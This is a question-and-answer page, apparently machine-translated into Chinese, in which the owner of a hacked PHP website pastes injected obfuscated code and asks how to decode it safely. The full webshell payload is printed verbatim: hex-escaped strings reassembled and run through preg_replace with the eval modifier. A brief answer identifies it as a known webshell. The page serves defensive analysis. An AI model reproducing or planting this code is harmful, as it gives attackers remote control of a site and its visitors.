我继承了一个被黑客入侵的PHP网站,并在文件中找到了一些随机的PHP。
一个例子是:
\x20\57\x2a\40\x64\157\x6a\162\x74\164\x74\163\x68\167\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x36\55\x37\71\x29\51\x2c\40\x63\150\x72\50\x28\66\x33\62\x2d\65\x34\60\x29\51\x2c\40\x69\141\x63\151\x77\155\x6f\160\x6e\163\x28\44\x68\147\x78\170\x64\170\x75\143\x71\153\x2c\44\x69\166\x7a\155\x6a\141\x7a\151\x68\153\x29\51\x29\73\x20\57\x2a\40\x63\145\x76\155\x66\144\x66\144\x6d\170\x20\52\x2f\40
如何将其转换为人类可读的文字?
我害怕在它上面运行eval()
。我试过的三个在线反混淆器没有翻译这些代码,所以不确定如何从这里开始。
整个注入的代码是这样的:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $ivzmjazihk = '%x5c%x7860GB)fubfsdXA%x5c%x78X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x]_%x5c%x785c}X%x5c%x7824<!%xc%x7878r.985:52985-t.98]K4]65]D8]825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5SV<*w%x5c%x7825)ppde>u%x5c%x7825V<6]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uq!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860o60{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x78c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%I#)q%x5c%x7825:>:r%x5%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%xfm%x5c%x7825:-5ppde:4:|:**#ppde#%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]23%x70%154%x69%164%50%x22%134%x78%62%x35%165%151%x6d%160%x6c%157%x64%145%x28%141%x78M7]381]211M5]67]452]88]5]48]32M3]317]445]212]425)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x782pnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c2]K6]72]K9]78]K5]53]Kc#<%x5c%x782c%x7825tmw!>!#]y84]275]y8257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5825)kV%x5c%x7878{**#k#)tutjyf%x5c%41]88M4P8]37]278]225]2417825bT-%x5c%x7825hW~%x5c%x7825fdy%x7825zB%x5c%x7825z>!tussfw)%x5c%x78225%x5c%x787f!<X>b%x5c%x7825Z<#opo#>3]248]y83]256]y81]265]y72]254]y76#<%x56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)df)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%%x5c%x782f},;#-#}+;%x5c%x7f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%xx5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXApjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~2e%52%x29%57%x65","%x65%166%x61%154%x28%c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x75tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7824<%x5c%x7825j,,*!|%x5c%x773]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x78824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%5]y31]53]y6d]281]y43]78]y33]65]y25w6Z6<.3%x5c%x7860hc%x7825!*9!%x5c%x7827c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5!>!%x5c%x7825i%x5c%x785)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]3x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c7825)gpf{jt)!gj!<*2bd%x5c%x7825-#rrd%x5c%x782f#00;quui#>.%x5c%x7825%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utp%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825%x5c%x785c%x5c%x7825j^%x25)sf%x5c%x7878pmpusut)tpqssutRe%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%xopjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!5c%x78257>%x5c%x782272qj%x5c%x78c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfm67R37,18R#>q%x5c%x7825*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%xgj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%sbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x78607R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#65c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<42%x2c%163%x74%162%x5f%16A%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5))) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n)3]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%yfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*125c%x7827!hmg%x5c%x78x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:57825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825ei}Y;tuofuopd%x5c%x7860uf5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x782425)7gj6<**2qj%x5c%x7825)h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%xx5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%6]277]y72]265]y39]271]y83]256]y75c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x78%x7825}U;y]}R;2]},;osvufs}%x5c%x7j!|!*bubE{h%x5c%x7825)j{hnpd!cnbs+yfeobz+sfwjidsb%x5c%x7860bj+78;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x#65,47R25,d7R17,67R37,#%x5c%x782f37]88y]27]28y]#%x5c%x782fr%x5c%x7827825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<51%x29%51%x29%73", NULL); }x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x78FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_5c%x7825)7fmji%x5c%x78786<c%x785csboe))1%x5c%x784y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%56]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x78240025}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x78222f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%xif((function_exists("%x6f%142%)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W+946:ce44#)zbssb!>!s]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23:W~!%x5c%x7825z!>2<!gpx5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbq5c%x7824)#P#-#Q#-#B#-#T#-#E#x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%xx7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gx78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x78{return chr(ord($n)-1);x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA75zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x782%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7h%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>upcotn+qsvmt+fmhpph#)zbssb!-#}#)fep257%x5c%x782f7#@#7%x5*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjud86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827kH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmds)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x78268]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!25rN}#QwTW%x5c%x7825hIrc%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%xb%x5c%x7825!*##>>X)!gjZ<#opo#>b%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**x5c%x7825<#462]47y]252]18y25j:,,Bjg!)%x5c%x7825j:>>1*!%V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAqp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]2827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7883]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x55c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-472%x5c%x7824<!%x5c%x7825mm!>!#]y81]27x7825%x5c%x7824-%x5c7824*<!%x5c%x7825kj:!>!#]y3dov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x-tr.984:75983:48984:71]K9]77]D4]8%x5c%x7825#%x5c%x782f#o]*#k#)usbut%x5c%x7860cpV%x5c%x787f%.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x<.5%x5c%x7860hA%x5c%x77-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%4]y76]61]y33]68]y34]68]y33]685]Ke]53Ld]53]Kc]55Ld]55#*<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%xx5f%163%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])%x7860%x5c%x785c^>Ew:Qb:Qcc%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)45]43]321]464]284]364]6]234]342]58]24]31#-%x57,*b%x5c%x7827)fepdof.)fc%x7825:|:**t%x5c%x7825)m%x5c%x7825=5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!25tjw!>!#]y84]275]y8osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x78604puft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x786*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%xXA6|7**197-2qj%x5c%x739275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuho825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfi)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepd#%x5c%x782f*)323zbe!-#jt0*?]+^?5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:fe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%q%x5c%x7825>U<#16,47R57,2} @error_reporting(0); preg_replace("%x2f%50%xx7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{27K6<%x5c%x787fw6*3qj%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x78^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%%x5c%x7825bG9}:}.}-}!#*<%x5>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%xovg}k~~9{d%x5c%x7825:824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!8]248]y83]256]y81]265]y72]258257;utpI#7>%x5c%x782f7rfs%x5c%5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%27&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5dk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x7]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*5%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y77825tdz)%x5c%x7825bbT-%x5c%xepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%/(.*)/epreg_replaceirshuqekqv'; $hgxxdxucqk = explode(chr((213-169)),'5162,30,7878,70,3729,60,5827,23,8991,46,1804,40,857,38,5966,57,3558,25,813,44,7065,64,6477,39,9234,39,7652,22,3189,41,5562,41,2315,20,3583,47,9593,37,1844,60,1686,63,7386,61,4878,26,1904,62,9449,31,4738,44,6370,50,8454,21,1158,39,65,38,0,29,9089,23,2901,32,4130,24,9732,52,942,66,6267,21,2242,41,6620,54,9148,59,5850,60,4340,57,481,68,9544,49,2602,55,1452,67,3903,44,7674,56,5192,41,8331,65,7538,45,2566,36,4052,24,6067,52,29,36,371,58,8276,55,5049,56,429,52,1749,55,3630,41,1519,55,9037,52,4154,37,3947,20,227,56,2335,21,6826,52,5428,59,7329,57,1647,39,8140,52,5650,48,4430,29,2843,58,3137,52,7825,53,2499,33,9836,39,6785,41,7974,61,2532,34,1008,54,8080,24,10057,49,7129,67,2933,70,4459,33,6232,35,4782,63,2722,34,8790,69,5337,20,3230,61,4845,33,5757,70,1325,35,6588,32,8577,59,9630,54,6332,38,5603,47,2181,61,1574,26,8533,44,6288,44,9330,21,8212,64,8475,58,674,32,8703,56,8859,52,4666,45,7504,34,2657,41,6729,56,283,34,4552,33,8966,25,3291,48,3003,22,6023,44,1197,34,2462,37,4397,33,6944,68,4492,60,2756,37,7480,24,8759,31,165,28,769,44,2065,69,8192,20,1360,38,1134,24,7012,53,4980,69,3521,37,3025,69,4585,35,9875,37,610,21,8104,36,3394,62,4926,54,6674,26,9684,48,3339,55,2134,47,7243,38,3789,52,9784,52,4076,54,2698,24,7196,47,706,63,9480,64,7281,20,7583,69,2033,32,9351,70,9912,57,8636,67,103,62,7301,28,8911,55,4191,70,6119,48,2391,23,8396,58,4011,41,1062,39,1288,37,5910,56,6516,23,631,43,3671,58,549,61,3967,44,1398,54,193,34,317,54,7447,33,1101,33,1966,67,3456,65,6878,66,7798,27,9207,27,6539,49,10029,28,1255,33,2414,48,1231,24,5357,49,895,47,8035,45,2356,35,4904,22,5105,57,6167,65,3094,43,9112,36,6700,29,9273,57,4293,47,4620,46,7948,26,5406,22,6420,57,1600,47,2793,50,5233,65,5515,47,5487,28,5298,39,3841,62,5698,59,9969,60,4261,32,9421,28,7770,28,2283,32,7730,40,4711,27'); $mfxnuausux=substr($ivzmjazihk,(35629-25523),(47-40)); if (!function_exists('iaciwmopns')) { function iaciwmopns($gtbnedyvsd, $rdgmsubzux) { $skkclzrhrt = NULL; for($dwnkkixtwc=0;$dwnkkixtwc<(sizeof($gtbnedyvsd)/2);$dwnkkixtwc++) { $skkclzrhrt .= substr($rdgmsubzux, $gtbnedyvsd[($dwnkkixtwc*2)],$gtbnedyvsd[($dwnkkixtwc*2)+1]); } return $skkclzrhrt; };} $hsrxlhitjb="\x20\57\x2a\40\x64\157\x6a\162\x74\164\x74\163\x68\167\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x36\55\x37\71\x29\51\x2c\40\x63\150\x72\50\x28\66\x33\62\x2d\65\x34\60\x29\51\x2c\40\x69\141\x63\151\x77\155\x6f\160\x6e\163\x28\44\x68\147\x78\170\x64\170\x75\143\x71\153\x2c\44\x69\166\x7a\155\x6a\141\x7a\151\x68\153\x29\51\x29\73\x20\57\x2a\40\x63\145\x76\155\x66\144\x66\144\x6d\170\x20\52\x2f\40"; $hqmeihxpzv=substr($ivzmjazihk,(58177-48064),(71-59)); $hqmeihxpzv($mfxnuausux, $hsrxlhitjb, NULL); $hqmeihxpzv=$hsrxlhitjb; $hqmeihxpzv=(377-256); $ivzmjazihk=$hqmeihxpzv-1; ?>
我的目标是找出它可以造成多少伤害。
答案 0 :(得分:2)
第一部分转换为
<?php if(!isset($GLOBALS["anuna"]))
这表明您感染了PHP webshell,s。 this link on reddit
最后,您会找到解码的PHP脚本的链接